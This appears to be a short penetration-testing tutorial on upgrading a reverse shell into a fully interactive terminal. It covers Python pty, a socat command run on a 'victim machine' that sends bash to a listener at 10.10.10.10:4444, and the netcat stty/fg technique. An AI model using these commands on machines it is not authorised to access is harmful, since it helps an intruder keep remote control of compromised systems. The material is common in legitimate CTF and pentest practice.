Author: lomar
# Method 1: Python pty module
python -c 'import pty; pty.spawn("/bin/bash")'or
python3 -c 'import pty; pty.spawn("/bin/bash")'Method 2: Using socat
On your own machine:
socat file:`tty`,raw,echo=0 tcp-listen:4444On victim machine:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.10.10.10:4444If socat is not installed on victim machine, you can download is and upload to victim machine from thisGithub repository.
Method 3: Upgrading from netcat with magic
Background The Reverse Shell
First you have to background your shell, to do this CTRL+Z
TERM
Second get your TERM type, for this you can use the command:
echo $TERM
xterm-256colornow you have got your TERM type.
STTY
Third you have to get information of your stty, to do this run this command:
stty -a
speed 38400 baud; rows 52; columns 236; line = 0;
intr = ^C; quit = ^\; erase = ^?; kill = ^U; eof = ^D; eol = <undef>; eol2 = <undef>; swtch = <undef>; start = ^Q; stop = ^S; susp = ^Z; rprnt = ^R; werase = ^W; lnext = ^V; discard = ^O; min = 1; time = 0;
-parenb -parodd -cmspar cs8 -hupcl -cstopb cread -clocal -crtscts
-ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr icrnl ixon ixoff -iuclc -ixany -imaxbel iutf8
opost -olcuc -ocrnl onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0
isig icanon iexten echo echoe echok -echonl -noflsh -xcase -tostop -echoprt echoctl echoke -flusho -extprocSummary
TERM is xterm-256color. Rows 52 and olumns 236
Get Back
To get back to reverse shell run the commands respectively:
stty raw -echoand
fgWhen the reverse shell command re-executed (e.g nc -nvlp 4444) run:
resetafter reset command it looks like normal again, however lastly you have to run these commands respectively:
export SHELL=bash
export TERM=xterm256-color
stty rows 52 columns 236Conclusion
Now you reverse shell is as interactive as SSH shell!